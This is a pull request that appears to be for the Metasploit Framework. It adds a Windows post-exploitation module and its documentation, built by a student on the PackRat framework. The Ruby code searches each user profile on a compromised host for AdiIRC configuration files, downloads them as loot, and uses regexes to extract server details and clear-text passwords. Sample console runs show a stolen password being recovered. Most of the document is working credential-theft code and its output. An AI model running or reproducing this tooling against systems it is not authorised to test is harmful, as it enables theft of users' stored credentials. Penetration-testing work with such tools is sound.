### PR TITLE
Add Adi IRC PackRat module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/adi_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/adi_irc.md
@@ -35,7 +35,7 @@ This option is turned on by default and will perform the data extraction using t
 regular expression. The 'Store loot' options must be turned on in order for this to take work.
 
 ## Scenarios
-### Default Output
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Default Output
 ```
 msf6 post(windows/gather/credentials/adi_irc) > run
 
@@ -87,7 +87,7 @@ msf6 post(windows/gather/credentials/adi_irc) > run
 [*] Post module execution completed
 ```
 
-### Verbose Output
+### AdiIRC Client v4.4 on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045 - Verbose Output
 ```
 msf6 post(windows/gather/credentials/adi_irc) > run
 

--- a/documentation/modules/post/windows/gather/credentials/adi_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/adi_irc.md
@@ -164,6 +164,4 @@ msf6 post(windows/gather/credentials/adi_irc) > run
 [*] undefined method `each' for nil:NilClass
 [*] PackRat credential sweep Completed
 [*] Post module execution completed
-
-
 ```

--- a/documentation/modules/post/windows/gather/credentials/adi_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/adi_irc.md
@@ -1,0 +1,169 @@
+## Vulnerable Application
+
+  This post-exploitation module extracts clear text credentials from the Adi IRC Client.
+
+  The Adi IRC Client is avaialble from (https://www.adiirc.com/).
+
+  This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
+
+  This module extracts server information such as server name, server port, user name, and password.
+
+
+## Verification Steps
+
+1. Start MSF console
+2. Get a Meterpreter session on a Windows system
+3. use post/windows/gather/credentials/adi_irc
+4. Set SESSION 1
+5. enter 'run' to extract credentials from all applications
+
+
+## Options
+### VERBOSE
+
+By default verbose is turned off. When turned on, the module will show information on files
+which aren't extracted and information that is not directly related to the artifact output.
+
+
+### STORE_LOOT
+This option is turned on by default and saves the stolen artifacts/files on the local machine,
+this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.
+
+
+### EXTRACT_DATA
+This option is turned on by default and will perform the data extraction using the predefined
+regular expression. The 'Store loot' options must be turned on in order for this to take work.
+
+## Scenarios
+### Default Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Adi irc's Config file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini
+
+[+] serverhost=chat.freenode.net
+[+] Serverhost=irc.test.net
+[+] serverport=6667
+[+] Serverport=6667
+[+] Usernick=TheTester
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
+[*] Adi irc's Networks file found
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+```
+
+### Verbose Output
+```
+msf6 post(windows/gather/credentials/adi_irc) > run
+
+[*] Filtering based on these selections:  
+[*] ARTIFACTS: All
+[*] STORE_LOOT: true
+[*] EXTRACT_DATA: true
+
+[*] Starting Packrat...
+[-] Adi irc's base folder not found in user's user directory
+
+[-] Adi irc's base folder not found in user's user directory
+
+[*] Starting Packrat...
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for config.
+[*] Adi irc's Config file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
+[*] Adi irc Config.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083813_default_10.0.0.2_AdiIRCconfig.ba_900175.bak
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_209914.bak
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
+[*] Adi irc Config.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCconfig.in_918837.ini
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverhost=chat.freenode.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverhost=irc.test.net
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Serverport=6667
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] Usernick=TheTester
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] QuickPassword=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_383684.ini
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._579169.ini
+
+[+] File with data saved:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_EXTRACTIONconfig_073623.ini
+[*] Adi irc's base folder found
+[*] Found the folder containing specified artifact for networks.
+[*] Adi irc's Networks file found
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
+[*] Adi irc Networks.ini downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083814_default_10.0.0.2_AdiIRCnetworks._045399.ini
+
+[*] undefined method `each' for nil:NilClass
+[*] Processing C:\Users\test\AppData\Local\AdiIRC
+[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
+[*] Adi irc Networks.bak downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508083815_default_10.0.0.2_AdiIRCnetworks._439992.bak
+
+[*] undefined method `each' for nil:NilClass
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+
+```

--- a/documentation/modules/post/windows/gather/credentials/adi_irc.md
+++ b/documentation/modules/post/windows/gather/credentials/adi_irc.md
@@ -1,12 +1,12 @@
 ## Vulnerable Application
 
-  This post-exploitation module extracts clear text credentials from the Adi IRC Client.
+This post-exploitation module extracts clear text credentials from the Adi IRC Client.
 
-  The Adi IRC Client is avaialble from (https://www.adiirc.com/).
+The Adi IRC Client is avaialble from (https://www.adiirc.com/).
 
-  This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
+This module extracts information from the config.ini and networks.ini files in the "AppData\Local\AdiIRC" directory.
 
-  This module extracts server information such as server name, server port, user name, and password.
+This module extracts server information such as server name, server port, user name, and password.
 
 
 ## Verification Steps

--- a/modules/post/windows/gather/credentials/adi_irc.rb
+++ b/modules/post/windows/gather/credentials/adi_irc.rb
@@ -79,11 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
-                                                          k[:filetypes]
-                                                        end.uniq.unshift('All')
-        ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/adi_irc.rb
+++ b/modules/post/windows/gather/credentials/adi_irc.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  # this associative array defines the artifacts known to PackRat
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'Adi IRC',
+      app_category: 'IRC',
+      gatherable_artifacts: [
+        {
+          filetypes: 'quick_connect',
+          path: 'LocalAppData',
+          dir: 'AdiIRC',
+          artifact_file_name: 'config',
+          description: 'Quick Connect Server Details',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:Serverhost=.*)',
+                '(?i-mx:Serverport=.*)',
+                '(?i-mx:Usernick=.*)',
+                '(?i-mx:QuickPassword=.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'Networks',
+          path: 'LocalAppData',
+          dir: 'AdiIRC',
+          artifact_file_name: 'networks',
+          description: 'Saved Networks',
+          credential_type: 'text'
+        }
+      ]
+    }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Adi IRC credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials stored on AdiIRC Client in a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Tierney',
+          'Kazuyoshi Maruta',
+          'Daniel Hallsworth',
+          'Barwar Salim M',
+          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
+        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
+        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
+        # enumerates the options based on the artifacts that are defined below
+        OptEnum.new('ARTIFACTS', [
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
+                                                          k[:filetypes]
+                                                        end.uniq.unshift('All')
+        ])
+      ]
+    )
+  end
+
+  def run
+    print_status('Filtering based on these selections:  ')
+    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
+    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
+    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
+
+    # used to grab files for each user on the remote host
+    grab_user_profiles.each do |userprofile|
+      run_packrat(userprofile, ARTIFACTS)
+    end
+
+    print_status 'PackRat credential sweep Completed'
+  end
+end

--- a/modules/post/windows/gather/credentials/adi_irc.rb
+++ b/modules/post/windows/gather/credentials/adi_irc.rb
@@ -75,7 +75,6 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        # OptRegexp.new('REGEX', [false, 'Match a regular expression', '^secret']),
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below


### PR DESCRIPTION
As A part of my final year project at Leeds Beckett University, I have developed several post-exploitation modules utilising the existing PackRat framework built by former LBU students. This PR will add a new `/post/windows/gather/credentials` module for the Adi IRC Client. [https://www.adiirc.com/](url)

This pull request will add two files:
1. modules/post/windows/gather/credentials/adi_irc.rb
2. documentation/modules/post/windows/gather/credentials/adi_irc.md


## Verification

1. Start `msfconsole`
2.  Get a Meterpreter session on a Windows system
3. `use post/windows/gather/credentials/adi_irc`
4. `Set SESSION 1`
5. `run`

## Scenario
Using AdiIRC Client v4.4 running on Microsoft Windows 10 Home 10.0.19045 N/A Build 19045
```
msf6 post(windows/gather/credentials/adi_irc) > run

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Adi irc's Config file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.bak
[*] Adi irc Config.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083920_default_10.0.0.2_AdiIRCconfig.ba_051695.bak

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_949744.bak
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\config.ini
[*] Adi irc Config.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCconfig.in_618977.ini

[+] serverhost=chat.freenode.net
[+] Serverhost=irc.test.net
[+] serverport=6667
[+] Serverport=6667
[+] Usernick=TheTester
[+] QuickPassword=tiaspbiqe2r
[+] File with data saved:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_EXTRACTIONconfig_981500.ini
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083921_default_10.0.0.2_AdiIRCnetworks._976889.ini

[+] File with data saved:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_EXTRACTIONconfig_407804.ini
[*] Adi irc's Networks file found
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.ini
[*] Adi irc Networks.ini downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._497206.ini

[*] undefined method `each' for nil:NilClass
[*] Downloading C:\Users\test\AppData\Local\AdiIRC\networks.bak
[*] Adi irc Networks.bak downloaded
[+] File saved to:  /home/kali/.msf4/loot/20240508083922_default_10.0.0.2_AdiIRCnetworks._102963.bak

[*] undefined method `each' for nil:NilClass
[*] PackRat credential sweep Completed
[*] Post module execution completed
```